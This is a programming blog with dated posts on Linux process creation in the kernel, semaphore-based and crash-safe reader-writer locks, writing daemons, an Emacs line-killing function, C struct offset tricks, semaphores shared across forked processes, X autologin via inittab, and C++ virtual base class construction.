Monday, June 15, 2009

linux: creation of the new process

System developers know that you need fork system call to start a new process and execve system call to start a new program. While fork creates a copy of the current process(actually not a complete copy - please refer to the man page of fork to get information what is being duplicated and currently COW is used to postpone the copying of the memory regions), execve replaces current running process with a new executable binary.

Here I'll try to describe how the new process is being created in the kernel.

First of all the kernel has to handle a system call and switch from the userspace into the kernelspace. On different architectures this is done in different ways. On x86 it's most likely 0x80 software interrupt or swi instruction on ARM. The system call interface, SCI, demultiplexes the system call into the call of a routine in the kernel kingdom: gets the pointer of the routine in the syscall table.
fork system call is multiplexed into sys_fork kernel function. Its prototype is:

int sys_fork(struct pt_regs *regs)
. This is a arch-dependent routine. struct pt_regs is a set of CPU registers which are saved in the process' memory region. When userspace makes a system call CPU registers of current process are taken. Arch-dependent sys_fork makes initial checks(for example it returns -EINVAL on ARM without MMU) and finally calls system-independent do_fork:
long do_fork(unsigned long clone_flags,
       unsigned long stack_start,
       struct pt_regs *regs,
       unsigned long stack_size,
       int __user *parent_tidptr,
       int __user *child_tidptr)
clone_flags represent policy of what should be copied and what should be shared between the process that called sys_fork(parent process) and newly created process(child process). stack_start and stack_size point to the start of the stack and its size respectively. These values are taken from the information obtained about the current process. regs is a pointer to CPU registers of the current process. This structure represents the state of the CPU registers. For x86 it's defined as
struct pt_regs {
 long ebx;
 long ecx;
 long edx;
 long esi;
 long edi;
 long ebp;
 long eax;
 int  xds;
 int  xes;
 int  xfs;
 long orig_eax;
 long eip;
 int  xcs;
 long eflags;
 long esp;
 int  xss;
};
and for ARM as
struct pt_regs {
 long uregs[18];
};

#define ARM_cpsr uregs[16]
#define ARM_pc  uregs[15]
#define ARM_lr  uregs[14]
#define ARM_sp  uregs[13]
#define ARM_ip  uregs[12]
#define ARM_fp  uregs[11]
#define ARM_r10  uregs[10]
#define ARM_r9  uregs[9]
#define ARM_r8  uregs[8]
#define ARM_r7  uregs[7]
#define ARM_r6  uregs[6]
#define ARM_r5  uregs[5]
#define ARM_r4  uregs[4]
#define ARM_r3  uregs[3]
#define ARM_r2  uregs[2]
#define ARM_r1  uregs[1]
#define ARM_r0  uregs[0]
#define ARM_ORIG_r0 uregs[17]
parent_tidptr and child_tidptr are pointers which help userspace libraries to handle threads(NPTL respectively).
do_fork again does some checks and calls copy_process which is responsible for make a copy of the process. copy_process again does some checks of supplied flags and does the copying of the process:
* duplicates task structure;
* allocates memory for kernel stack and puts instance of struct thread_info on the bottom of the kernel stack which holds arch-specific information about the process;
* copies process information: fs, opened files, IPC, signal handling, mm, etc.;
* generates new PID and other IDs in respect of namespace information;
* does some further actions according to passed flags.
Interesting how memory copying is managed by copy_process. mm structure described by struct mm_struct is being copied by copy_mm function. If CLONE_VM was supplied it doesn't copy the memory management information of the parent process but shares it with child and adjusts reference counter of the users of this mm. If no CLONE_VM was set dup_mm is called. This function makes a copy of the mm struct but doesn't copy the contents of the memory pages - copy-on-write is used to make this process run faster and do not waste system memory. When either parent or child process attempts to write to the memory page page fault occurs and kernel recognizes that the page should be copied for each process and write operation could be later satisfied: the result of this operation would be visible only for initiator.
Another interesting function called by copy_process is copy_thread. This routine is architecture dependent and in general among other management tasks it copies CPU registers of current process to the new process and adjusts some of their values(stack pointer, etc.). Also it sets pc(for ARM)/ip(for x86) to ret_from_fork. ret_from_fork will be called next time the newly created process will be scheduled to run. This function does some cleanups and returns control to the userspace. Linux saves CPU registers in the top of the kernel stack of the process. This information helps kernel to do a context switch.
When the process is ready to run do_fork calls wake_up_new_task(or sets TASK_STOPPED if process is being traced) which informs process scheduler that task is ready.
At this point kernel returns execution point into the userland.

Tuesday, May 5, 2009

*nix: crash-safe rw-lock with semaphores

In previous post about rw-locks based on semaphores I've introduced rw-lock mechanism to limit readers.
This post introduces crash-safe implementation of rw-locks. The implemlementation doesn't take into account bad application design. It doesn't detect deadlocks however this is not hard to implement when you get the main idea.
The implementation tracks readers and writers and can detect whether reader/writer that currently blocks the queue is alive and tries to improve the whole situation.
The threads are not taken into account because if thread crashes due to some unpredicted reason most likely the process that created it will die too. If thread exits without releasing the lock this is not a crash - it's poor application design. Safiness of such behaviors is another topic I believe.

In the real world you may get some situation when you want some safiness with locking the section and the code of this section might fail because of the outer world influence(unhandled signal, OOM-killer) and interior ifluence(the code of section might cause segfault).

To behonest most of the time I don't believe the code I'm protecting and that the outer world is kind for me. The code might cause crash deeply inside the function calls and the OOM killer might chose the application as victim.
Knowing all these I want the whole application continue to run.
The implemetation of crash-safe rw-locks is listed below. Well, it's a bit linux-specific(in the mmap call) but this is just for simplicity. I didn't want to overload the code to make it cross-platform.

#include <semaphore.h>
#include <sys/mman.h>
#include <stdlib.h>
#include <stdio.h>
#include <errno.h>
#include <time.h>
#include <string.h>

struct rw_lock *rw;

struct rw_lock {
 sem_t wbl;
 sem_t rbl;
 sem_t r;
 sem_t w;
 int limit;
 pid_t writer;
 pid_t *readers;
};

void init_rwlock(struct rw_lock **rw, int limit)
{
 *rw = mmap(NULL, sizeof(struct rw_lock), PROT_READ|PROT_WRITE, MAP_SHARED|MAP_ANONYMOUS, 0, 0);

 sem_init(&(*rw)->r, 1, limit);
 sem_init(&(*rw)->w, 1, 1);
 sem_init(&(*rw)->wbl, 1, 1);
 sem_init(&(*rw)->rbl, 1, 1);
 (*rw)->limit = limit;
 (*rw)->writer = 0;
 (*rw)->readers = mmap(NULL, sizeof(pid_t)*limit, PROT_READ|PROT_WRITE, MAP_SHARED|MAP_ANONYMOUS, 0, 0);
}

void rlock(struct rw_lock *rw)
{
 int i;
 struct timespec to = {
  .tv_sec = 1,
  .tv_nsec = 0
 };

 sem_wait(&rw->w);

 do {
  if (sem_timedwait(&rw->r, &to) == 0) {
   break;
  } else if (errno == ETIMEDOUT) {
   sem_wait(&rw->rbl);
   for (i=0;i<rw->limit;++i)
    if (rw->readers[i] && kill(rw->readers[i], 0) == -1 && errno == ESRCH) {
     printf("deadlock detected: process invoked rlock died(%d)\n", rw->readers[i]), fflush(NULL);
     rw->readers[i] = 0;
     sem_post(&rw->r);

     break;
    }
   sem_post(&rw->rbl);
  }
 } while (1);

 sem_wait(&rw->rbl);
 for (i=0;i<rw->limit;++i)
  if (rw->readers[i] == 0) {
   rw->readers[i] = getpid();

   break;
  }
 sem_post(&rw->rbl);

 sem_post(&rw->w);
}

void runlock(struct rw_lock *rw)
{
 int i, current = getpid();

 sem_wait(&rw->rbl);
 for (i=0;i<rw->limit;++i)
  if (rw->readers[i] == current) {
   rw->readers[i] = 0;

   break;
  }
 sem_post(&rw->rbl);

 sem_post(&rw->r);
}

void wlock(struct rw_lock *rw)
{
 int val;
 pid_t current = getpid();
 struct timespec to = {
  .tv_sec = 1,
  .tv_nsec = 0
 };
 time_t wfr0, wfr1;

 do {
  if (sem_timedwait(&rw->w, &to) == 0) {
   break;
  } else if (errno == ETIMEDOUT) {
   sem_wait(&rw->wbl);
   if (rw->writer && kill(rw->writer, 0) == -1 && errno == ESRCH) {
    printf("deadlock detected: process invoked wlock died(%d)\n", rw->writer), fflush(NULL);
    rw->writer = 0;
    sem_post(&rw->w);
   }
   sem_post(&rw->wbl);
  }
 } while (1);
 sem_wait(&rw->wbl);
 rw->writer = current;
 sem_post(&rw->wbl);

 wfr0 = time(NULL);
 do {
  wfr1 = time(NULL);
  if ((wfr1 - wfr0) > 1) {
   int i;
   sem_wait(&rw->rbl);
   for (i=0;rw->limit;++i)
    if (rw->readers[i] && kill(rw->readers[i], 0) == -1 && errno == ESRCH) {
     printf("deadlock detected: process invoked rlock died(%d)\n", rw->readers[i]), fflush(NULL);
     rw->readers[i] = 0;
     sem_post(&rw->r);

     break;
    }
   sem_post(&rw->rbl);
   wfr0 = wfr1;
  }

  sem_getvalue(&rw->r, &val);

 } while (val != rw->limit);
}

void wunlock(struct rw_lock *rw)
{
 sem_wait(&rw->wbl);
 rw->writer = 0;
 sem_post(&rw->wbl);

 sem_post(&rw->w);
}
The idea is simple. If the process unable to lock the section for some time it checks whether the previos holder is alive. Otherwise the process tries to release the semaphore and accuire it again. It's possible to omit release/accuire procedure and just change the holder. You'll gain some performance with this change. I left this just to make the code more clear.

The application that simulates crashes is shown below:
int *counter;

void reader(void)
{
 while (1) {
  rlock(rw);
  if (*counter == 1024*4) {
   runlock(rw);
   break;
  }
  if (*counter !=0 && *counter%1024 == 0) {
   printf("reader died(counter: %d, pid: %d)\n", *counter,getpid()), fflush(NULL);
   *(int *)0 = 0;
  }
  runlock(rw);
 }
}

void writer(void)
{
 while (1) {
  wlock(rw);
  if (*counter == 2048*2) {
   wunlock(rw);
   break;
  }
  ++*counter;
  if (*counter !=0 && *counter%2048 == 0) {
   printf("writer died(counter: %d, pid: %d)\n", *counter, getpid()), fflush(NULL);
   *(int *)0 = 0;
  }
  wunlock(rw);
 }
}
int main(int argc, char **argv)
{
 int i;

 counter = mmap(NULL, sizeof(int), PROT_READ|PROT_WRITE, MAP_SHARED|MAP_ANONYMOUS, 0, 0);

 init_rwlock(&rw, 5);

 for (i=0;i<10;++i)
  if (fork() == 0) {
   reader();

   return 0;
  }

 for (i=0;i<5;++i)
  if (fork() == 0) {
   writer();

   return 0;
  }

 for (i=0;i<15;++i)
  wait(NULL);

 printf("counter: %d\n", *counter);

 return 0;
}
After running this application you'll find the information about the crashed processes in dmesg:
*sudo dmesg -c
test[8806]: segfault at 0 ip 08048d5e sp bf828290 error 6 in test[8048000+2000]
test[8812]: segfault at 0 ip 08048e01 sp bf828290 error 6 in test[8048000+2000]
test[8801]: segfault at 0 ip 08048d5e sp bf828290 error 6 in test[8048000+2000]
test[8804]: segfault at 0 ip 08048d5e sp bf828290 error 6 in test[8048000+2000]
test[8808]: segfault at 0 ip 08048d5e sp bf828290 error 6 in test[8048000+2000]
test[8799]: segfault at 0 ip 08048d5e sp bf828290 error 6 in test[8048000+2000]
test[8800]: segfault at 0 ip 08048d5e sp bf828290 error 6 in test[8048000+2000]
test[8802]: segfault at 0 ip 08048d5e sp bf828290 error 6 in test[8048000+2000]
test[8805]: segfault at 0 ip 08048d5e sp bf828290 error 6 in test[8048000+2000]
test[8809]: segfault at 0 ip 08048e01 sp bf828290 error 6 in test[8048000+2000]
And the application should produce following output:
reader died(counter: 1024, pid: 8806)
deadlock detected: process invoked rlock died(8806)
writer died(counter: 2048, pid: 8812)
deadlock detected: process invoked wlock died(8812)
reader died(counter: 2048, pid: 8801)
reader died(counter: 2048, pid: 8804)
reader died(counter: 2048, pid: 8808)
reader died(counter: 2048, pid: 8799)
reader died(counter: 2048, pid: 8802)
deadlock detected: process invoked rlock died(8801)
reader died(counter: 2048, pid: 8800)
deadlock detected: process invoked rlock died(8800)
reader died(counter: 2048, pid: 8805)
deadlock detected: process invoked rlock died(8805)
deadlock detected: process invoked rlock died(8804)
deadlock detected: process invoked rlock died(8808)
deadlock detected: process invoked rlock died(8799)
deadlock detected: process invoked rlock died(8802)
writer died(counter: 4096, pid: 8809)
deadlock detected: process invoked wlock died(8809)
counter: 4096, max_readers: 5
As you can see there are few readers crashed in the same circumstances just because they were allowed to do so.

Tuesday, April 21, 2009

linux: how to become a real daemon?

When you want to write a daemon - a program that runs in background and serves during all the time that machine run(or almost all the time) you there are few things that's better to remember.

First of all the daemon should release controlling terminal. If daemon holds controlling terminal SIGHUP is sent when controlling terminal is lost. This happens if CLOCAL flag on the terminal is not set. That's not a good idea to handle these signals as a workaround to keep process running if controlling terminal is lost.
In linux(and maybe in some other OSes) lately CLOCAL is usually set but the developer shouldn't rely on this.

There are few ways to detach from the controlling terminal.
The easy way is to request TIOCNOTTY from the tty device if it supports it:

int tty = open("/dev/tty", O_RDWR);
if (tty == -1)
    return -1;

if (ioctl(tty, TIOCNOTTY, (char *)0) == -1)
    return -1;

close(tty);
This might not work for in some OSes. There is another opportunity.
Daemon has to create a new session using setsid. The caller of setsid becomes a process leader without controlling terminal. There is one thing with setsid - it creates a new session if caller is not a process group leader.
To do so first of all the daemon should call setsid from its child. The child will become a process leader and will get closer to be a real daemon and the parent will exit taking controlling tty with itself:
#include <unistd.h>

int main(int argc, char **argv)
{
 if (fork() == 0) {
  setsid();
  while (1) {
   /* Daemons like to sleep */
   sleep(1);
  }
 }

 return 0;
}
Next thing is to release current working directory. It's not good if daemon starts in some directory that is placed on filesystem that might be unmounted during the daemon's work. You won't be able to unmount the filesystem in that case. Simply chdir to '/' is a good choice.
Also it'd be nice to close stdin/stdout/stderr file descriptors since the daemon doesn't need them and some system resources could be saved. If the daemon is going to produce some output that's bad idea to use inherited stdout and stderr since you don't know where they might be redirected. It's better to provide new open descriptors(stdout and/or stderr might point to some log file):
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <stdio.h>

int main(int argc, char **argv)
{
 if (fork() == 0) {
  int log;

  setsid();

  log = open("/tmp/test.log", O_CREAT|O_APPEND|O_RDWR, 0755);
  close(0);
  close(2);
  dup2(log, 1);

  printf("Daemon is started\n");
  while (1) {
   /* Daemons like to sleep */
   sleep(1);
   printf("Daemon is sleeping\n");
   fflush(NULL);
  }
 }

 return 0;
}
The output will go to "/tmp/test.log":
*./test 
*tail /tmp/test.log -f
Daemon is started
Daemon is sleeping
Daemon is sleeping
Daemon is sleeping
Daemon is sleeping
Daemon is sleeping

Tuesday, April 14, 2009

emacs: proper kill-whole-line

I'm using emacs not for a long time but I really liked it. It took not much time to get used to it. Though emacs doesn't have some function you are free to write them in elisp easily!
I used to vim's 'dd' command which kills current line and later you are able to yank it.
emacs has 'kill-line' function to kill line from the current point except newline character or 'kill-whole-line' which kills following newline also. This doesn't fit me entirely. I would like to kill the whole line from the beginning including newline character. Simply you can wrap 'kill-whole-line' with adding an instruction to jump into the beginning of the line and finally kill it.
Looks like everything is done except the situation when you want to yank it back. When you'll try to yank the killed line you'll see that besides wanted line you have an extra newline. It was annoying for me to yank and kill the appendix. Finally I wrote my variant of 'kill-whole-line' - kill-total-line:

(defun kill-total-line ()
  (interactive)
  (let ((kill-whole-line t)) 
        (beginning-of-line)
        (kill-line)
        (setq top (car kill-ring))
        (setq last (substring top -1))
        (if (string-equal last "\n")
                (let ()
                  (setq stripped (substring top 0 -1))
                  (setq kill-ring (cons stripped (cdr kill-ring)))
                  )
          )
        )
  )
This 'kill-total-line' function kills the line from the beginning to the end and cuts newline symbol of the killed line in the kill-ring if any. Now I'm happy to kill lines and yank them back!

Tuesday, April 7, 2009

c: offset of the member in struct

Sometimes, very rarely, you know the pointer to the member of the structure and the type of the structure it belongs to. And in this rare situation you want to get pointer to the entire structure.

To get the pointer of the original structure you should know the offset of this member in the structure. The hint here is that you can use some base address(0 fits the best here), cast it into the pointer of the structure type, dereference with given member name and voilà - you have the offset. Look at the next code snippet:

struct S {
 int m0;
 char m1;
 short m2;
 long m3;
};
unsigned int m3_offset = (unsigned int)(&((struct S *)0)->m3);
Variable m3_offset holds the offset of the member m3 in structure S. In this case the offset of m3 is equal 8. So the address of the variable of type S is (address of m3) - m3_offset.
struct S *sp = (struct S *)((char *)&s.m3 - m3_offset);
You should cast pointer to member into char * to correctly use pointer arithmetics.
The whole code that shows this trick is below:
#include <stdio.h>

struct S {
 int m0;
 char m1;
 short m2;
 long m3;
};

unsigned int m3_offset = (unsigned int)(&((struct S *)0)->m3);

int main(int argc, char **argv)
{
 struct S s = {1, 2, 3, 4};
 struct S *sp = (struct S *)((char *)&s.m3 - m3_offset);

 printf("m1: %d\n", sp->m1);

 return 0;
}
The output should be
*./test 
m1: 2
This technique could be used to easily construct nested structures:
struct S0 {
 int s0m0;
};

struct S1 {
 struct S0 s1m0;
 int s1m1;
};

/**
 * pointer to member in S structure
 * type of S
 * name of member
 */
#define S(s, st, m)            \
 ({               \
  unsigned int offset = (unsigned int)(&((st *)0)->m); \
  (st *)((char *)s-offset);        \
 })

int main(int argc, char **argv)
{
 struct S1 s = {{1}, 2};

 printf("%d",S(&s.s1m0, struct S1, s1m0)->s1m1);

 return 0;
}
It's easy to build such data types as trees, queues and so on separately defining payload structures(data of the node) and helper structures(pointers to other nodes, etc.)
Doubly ended queue in linux kernel uses this approach and looking into the code you can definitely say - the code looks much clear if this technique is used.

Tuesday, March 31, 2009

linux: semget across the processes

Recently I've written an issue on whether the semaphore handle obtained with sem_open is valid in children processes.
To make the picture complete I'd like to describe is it possible to pass semaphore handle to children processes obtained by IXS's semget.

When you call semget with some key and the call was successful you get semaphore id that is valid not only within process tree but system wide.
So actually there shouldn't be any problems with the children processes that are using semaphore handle obtained in the parent process. Let's glance at the code below.

#include <unistd.h>
#include <stdio.h>
#include <fcntl.h>
#include <sys/types.h>
#include <sys/ipc.h>
#include <sys/sem.h>
#include <errno.h>
#include <string.h>

union semun
{
 int              val;    /* Value for SETVAL */
 struct semid_ds *buf;    /* Buffer for IPC_STAT, IPC_SET */
 unsigned short  *array;  /* Array for GETALL, SETALL */
};

int main()
{
 struct sembuf op[1];
 union semun ctrl;
 int sem = semget(0xF00B00, 1, IPC_CREAT|0600);
 if (sem == -1)
 {
  perror("semget");

  return 1;
 }

 op[0].sem_num = 0;
 op[0].sem_flg = 0;

 ctrl.val = 1;
 if (semctl(sem, 0, SETVAL, ctrl) == -1)
 {
  perror("semctl");

  return 1;
 }

 switch(fork())
 {
  case -1:
   perror("fork()");

   return 1;

  case 0:
  {
   printf("Child %u waiting for semaphore(%d)...\n",getpid(), sem);
   op[0].sem_op = 0;
   semop(sem, op, 1);
   printf("Child: Done\n");

   return 0;
  }
 }

 sleep(1);

 printf("Parent %u setting semaphore(%d)...\n",getpid(),sem);
 op[0].sem_op = -1;
 semop(sem, op, 1);
 printf("Parent: Set\n");

 return 0;
}
Here a semaphore was created and its initial value was 1. Next child process was created which waits on the semaphore until its value becomes zero. It finishes as soon as parent process decrements the value of the semaphore.The output of this test application would be
$ ./test 
Child 3353 waiting for semaphore(0)...
Parent 3352 setting semaphore(0)...
Child: Done
Parent: Set
With ipcs we can look at the system semaphores:
$ ipcs -s

------ Semaphore Arrays --------
key        semid      owner      perms      nsems     
0x00f00b00 0          niam      600        1 
You can see that semaphore with key 0x00f00b00 and id 0 is present in the system.
Since semaphore is system wide and could be accessed by its id the call to sem get may be omitted is we know that semaphore is already available and the id is known. The following code snippet is the same as previous one except there's no call to semget but value of sem is hardcoded with value 0(the id of that semaphore in our case):
int main()
{
 struct sembuf op[1];
 union semun ctrl;
 int sem = 0;

 op[0].sem_num = 0;
 op[0].sem_flg = 0;

 ctrl.val = 1;
 if (semctl(sem, 0, SETVAL, ctrl) == -1)
 {
  perror("semctl");

  return 1;
 }

 switch(fork())
 {
  case -1:
   perror("fork()");

   return 1;

  case 0:
  {
   printf("Child %u waiting for semaphore(%d)...\n",getpid(), sem);
   op[0].sem_op = 0;
   semop(sem, op, 1);
   printf("Child: Done\n");

   return 0;
  }
 }

 sleep(1);

 printf("Parent %u setting semaphore(%d)...\n",getpid(),sem);
 op[0].sem_op = -1;
 semop(sem, op, 1);
 printf("Parent: Set\n");

 return 0;
}
The output is
$ ./test 
Child 3366 waiting for semaphore(0)...
Parent 3365 setting semaphore(0)...
Child: Done
Parent: Set
Here as before the child process waits for the semaphore until the parent process decrements its value to become 0.

If you'll look into the code of semget you'll find that it does semget syscall. In ipc/util.c in the linux kernel tree you should be able to find ipcget function which calls ipcget_public routine that makes key checks and in under certain circumstances creates new semaphore with new id and adds to semaphore set. The value of id is system wide, so after the semaphore had been created you will be able to get access to it if you have appropriate permissions.

Friday, March 27, 2009

linux: automatic login

The time of laptop-per-human is almost came. Laptop is something personal like toothbrush - you are the only owner.
I do not really worry who is using laptop - because only I use it. So logging in each time I plug power on seemed strange for me. So I've forced gdm(gnome desktop manager) to autologin mode. The time passed and I realized that the only purpose of gdm is to automatically login to my session. "What the hell?" I said to myself. Why do I have to spend my laptop's resource on something that I don't really need(yep, I prefer to spend memory and cpu on emacs and gcc)?

So I've found nice approach to autologin to X session w/o any desktop managers.
That's really simple.
You should edit /etc/inittab configuration file and replace line which loads desktop manager with command that will launch X session for your user. For me it is

x:5:once:/bin/su <user> -l -c "/bin/bash --login -c 'ck-launch-session startx' &>/dev/null"

For distributions that use another approach to run DM(like gentoo - they load DM as a startup script) you can replace the line which loads DM with
/bin/su <user> -l -c "/bin/bash --login -c 'ck-launch-session startx' &>/dev/null"
or disable loading the startup script and modify inittab like I showed above.

Also it's possible to make automatic login in virtual consoles:
c1:2345:respawn:/sbin/mingetty -n -l <user> vc/1 linux
or
c1:2345:respawn:/sbin/agetty -n -l <external program> 38400 vc/1 linux
Whe external program will perform login for you. The program might be quite simple - just exec 'login' for your user.

Tuesday, March 24, 2009

*nix: rw-lock with semaphores

RW-lock is widely used synchronization technique. It allows multiply readers to go through the barrier if there is no writers and only one writer at one time.
This incredibly could speed up application if you expect more readers than writers and amount of readers is high(here should be some heuristic because if you have few readers and time of data lock in reader is small using rw-locks might be overhead).

You likely will find rw-lock mechanism in POSIX threads(pthread_rwlock_init, pthread_rwlock_rdlock, pthread_rwlock_wrlock, pthread_rwlock_unlock). As pthreads is a POSIX interface you will likely find it on any POSIX-compliant system.

When we are talking about process synchronization we'll more likely think about semaphores.
There is no such thing as rw-lock semaphore(some system have indeed).
Of course you still may set PTHREAD_PROCESS_SHARED on pthread rw-lock with pthread_rwlockattr_setpshared. But if you still want to use semaphores ...

Keeping in mind that rw-lock is operated by two types of tasks two semaphores are needed. One for writer. It will be binary semaphore. And one for readers. It will be counting semaphore.

When the reader tries to get the lock it checks if there is no writers. If nobody is writing, the reader increments counting semaphore and proceeds. On 'unlock' the reader just decrement the counting semaphore and that's all.
When the writer tries to 'lock' it takes(decrements) binary semaphore and wait until all readers finish their work. When there's no readers the writer proceeds. On 'unlock' the writer releases(increments) binary semaphore.

Look at the implementation below:

#include <semaphore.h>
#include <errno.h>

struct rwlock {
    sem_t rlock;
    sem_t wlock;
};

void init_rwlock(struct rwlock *rw);
void destroy_rwlock(struct rwlock *rw);
void rlock(struct rwlock *rw);
void runlock(struct rwlock *rw);
void wlock(struct rwlock *rw);
void wunlock(struct rwlock *rw);

void init_rwlock(struct rwlock *rw)
{
    sem_init(&rw->rlock, 1, 0);
    sem_init(&rw->wlock, 1, 1);
}

void destroy_rwlock(struct rwlock *rw)
{
    wlock(rw);

    sem_destroy(&rw->rlock);
    sem_destroy(&rw->wlock);
}

void rlock(struct rwlock *rw)
{
    sem_wait(&rw->wlock);

    sem_post(&rw->rlock);

    sem_post(&rw->wlock);
}
void wlock(struct rwlock *rw)
{
    int readers = 0;

    sem_wait(&rw->wlock);

    do {
        if (sem_getvalue(&rw->rlock, &readers) != -1) {
            if (readers == 0) {
  break;
            }
 }

 usleep(1);
    } while (1);
}

void runlock(struct rwlock *rw)
{
    do {
        if (sem_trywait(&rw->rlock) == -1) {
            if (errno != EAGAIN) {
                continue;
            }
        }
        break;
    } while (1);
}

void wunlock(struct rwlock *rw)
{
    sem_post(&rw->wlock);
}
This interface could be used by calling pairs rlock/runlock and wlock/wunlock. Check out next piece of code:
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
#include <errno.h>
#include <sys/mman.h>
int *counter;
struct rwlock *rw;

void reader(void)
{
    do {
        rlock(rw);
        printf(">>>>reader: counter %d\n", *counter), fflush(NULL);
        if (*counter == 16777216) {
            runlock(rw);
            break;
        }
        usleep(1);
        runlock(rw);
    } while(1);
}

void writer(void)
{
    do {
        wlock(rw);
        ++*counter;
        printf(">>>>writer: new counter %d\n", *counter), fflush(NULL);
 if (*counter == 16777216) {
            wunlock(rw);
            break;
        }
        wunlock(rw);
    } while (1);
}
int main(int argc, char **argv)
{
    pid_t children[100];
    int i;

    counter = mmap(NULL, sizeof(int), PROT_READ|PROT_WRITE, MAP_SHARED|MAP_ANONYMOUS, 0, 0);
    rw = mmap(NULL, sizeof(struct rwlock), PROT_READ|PROT_WRITE, MAP_SHARED|MAP_ANONYMOUS, 0, 0);

    *counter = 0;

    init_rwlock(rw);

    for (i=0;i<100;++i) {
        children[i] = fork();
        if (children[i] == -1) {
            printf("Problem with creating %d child: ''", i, strerror(errno)), fflush(NULL);
        }else if (children[i] == 0) {
            if (i%3 == 0) {
                writer();
            }else {
                reader();
            }
        }
    }

    wait(NULL);

    return 0;
}
Here 100 processes have been started where 1/3 are writers. You likely see that here permitted any number of readers. This could be a bottleneck if writer has to wait too long. pthreads rw-lock suffers from the same disease.
To make limitation on readers rlock function should be modified to check amount of readers that are currently holding the lock. With reader limitation rw-lock on semaphores will likely look like:
struct rwlock {
    sem_t rlock;
    sem_t wlock;
    int readers;
};

void init_rwlock(struct rwlock *rw, int readers);
void destroy_rwlock(struct rwlock *rw);
void rlock(struct rwlock *rw);
void runlock(struct rwlock *rw);
void wlock(struct rwlock *rw);
void wunlock(struct rwlock *rw);

void init_rwlock(struct rwlock *rw, int readers)
{
    sem_init(&rw->rlock, 1, 0);
    sem_init(&rw->wlock, 1, 1);
    rw->readers = readers;
}

void destroy_rwlock(struct rwlock *rw)
{
    wlock(rw);

    sem_destroy(&rw->rlock);
    sem_destroy(&rw->wlock);
}

void rlock(struct rwlock *rw)
{
    int readers;
    do {
        sem_wait(&rw->wlock);
 if (sem_getvalue(&rw->rlock, &readers) != -1) {
            if (readers < rw->readers) {

                sem_post(&rw->rlock);

                sem_post(&rw->wlock);

                break;
            }
 }
        sem_post(&rw->wlock);

        usleep(1);
    } while (1);
}

void wlock(struct rwlock *rw)
{
    int readers = 0;

    sem_wait(&rw->wlock);

    do {
        if (sem_getvalue(&rw->rlock, &readers) != -1) {
            if (readers == 0) {
                break;
            }
        }

        usleep(1);
    } while (1);
}

void runlock(struct rwlock *rw)
{
    do {
        if (sem_trywait(&rw->rlock) == -1) {
            if (errno != EAGAIN) {
                continue;
            }
        }
        break;
    } while (1);
}

void wunlock(struct rwlock *rw)
{
    sem_post(&rw->wlock);
}
The semaphores is really powerful tool for building different synchronization schemes.

Tuesday, March 17, 2009

c++: initialzation of the virtual base class

Recently I've touched problem that I haven't ever seen before with virtual base classes.
The problem didn't appeared for me because I haven't used non-default constructor in VBC(virtual base class).
According to standard the most-derived class is responsible for constructing VBC.
You might think that this is not a problem but let's look at the code snippet above:

#include <iostream>

using namespace std;

class VBC
{
  public:
    VBC(const string &i) : i(i) {}
  protected:
    string i;
};

class C : virtual public VBC
{
  public:
    C() : VBC("C") {}
};

class D : public C
{
  public:
    D() : VBC("D") {}
    void print() {cout << i << endl;}
};

int main(int argc, char **argv)
{
    D d;
    d.print();

    return 0;
}
First of all you might notice that class D must have non-trivial constructor to call constructor of VBC class as it is responsible for constructing instance of VBC. That's not a big deal but this depends on what you expect from the virtual base class and what the class hierarchy is. Let's assume that VBC's objection is just to hold the name of the current class instance. Class D stands here just for printing the value of VBC's member i. When d.print() is called you will see 'D' on the output. That's because you called VBC's constructor with argument "D".
Here the problem comes out. Looks like there is no solution how to make class D print 'C'. VBC won't be constructed in class C.
The compiler's behavior becomes more clear when you look at the multiply inheritance model:
class VBC
{
  public:
    VBC(const string &i) : i(i) {}
  protected:
    string i;
};

class C1 : virtual public VBC
{
  public:
    C1() : VBC("C1") {}
};

class C2 : virtual public VBC
{
  public:
    C2() : VBC("C2") {}
};

class D : public C1, public C2
{
  public:
    D() : VBC("D") {}
    void print() {cout << i << endl;}
};
Indeed here it's more clear that for compiler it's an undefined behavior which instance(C1's or C2's) of VBC to choose. Actually for class D neither VBC instance of C1 or C2 is constructed due to the nature of virtual base classes.
For the end user of the class it could be confusing to search for the virtual base class declaration through the hierarchy of inheritance to understand how constructor of virtual base class should be called.
In the Internet I've found a 'solution' that might resolve this issue: create default non-trivial constructor of VBC like this:
class VBC
{
  public:
    VBC(const string &i = "VBC") : i(i) {}
  protected:
    string i;
};

class C1 : virtual public VBC
{
  public:
    C1() : VBC("C1") {cout << i << endl;}
};

class C2 : virtual public VBC
{
  public:
    C2() : VBC("C2") {cout << i << endl;}
};

class D : public C1, public C2
{
  public:
    void print() {cout << i << endl;}
};
The biggest mistake of this solution is that member i of class D inherited from VBC will be initialized with value of "VBC" what is you might expect less among other variants.
Of course virtual inheritance makes sense in multiply inheritance model and such problem is more explicitly recognized there.
Probably the best solution is not to define non-default(even with predefined values of arguments) constructor in virtual base class but this is not that easy in the current world though.

Tuesday, March 10, 2009

linux: sem_open across the processes

Is it safe to use the address of the semaphore in child process obtained in the parent?
According to the man page it's not allowed:

References to copies of the semaphore produce undefined results.

That is true in general, the code below shouldn't work correctly.
int main()
{
 sem_t *sem = sem_open("key",O_CREAT,S_IRUSR|S_IWUSR,0);
 switch(fork())
 {
 case -1:
  perror("fork()");

  return 1;

 case 0:
 {
  printf("Child %u waiting for semaphore(%p)...\n",getpid(),sem);
  sem_wait(sem);
  printf("Child: Done\n");
  
  return 0;
 }
 }

 sleep(1);

 printf("Parent %u setting semaphore(%p)...\n",getpid(),sem);
 sem_post(sem);
 printf("Parent: Set\n");

 return 0;

}
But it works. At least in current implementation of linux and glibc.

sem_t is a pointer. You can found out that it's defined as a union but it's used only as a pointer. The union is used for alignment.

Looking into the sem_open.c in glibc sources you may find out that the return value of sem_open is actually the address returned from mmap call.
(sem_t *) mmap(NULL, sizeof (sem_t), PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0);
mmap maps the file in /dev/shm/(or where shmfs is mounted), with name "sem."+name from the sem_open first argument. In case if the semaphore had been already created sem_open searches for its address in the tree of opened semaphores. For the search it uses tuple of name of the file, inode and device.

The tree of opened semaphores is declared in sem_open.c. It's local for the process.

The call to sem_open in the child process will refer to the same tree of the opened semaphores(as the address space is being copied in case of fork) and will return the address from the previous call of sem_open in parent process.

Interesting that the address returned from sem_open will be the same if it was called in the child and in the parent process independently:
#include <stdio.h>
#include <error.h>
#include <errno.h>
#include <semaphore.h>
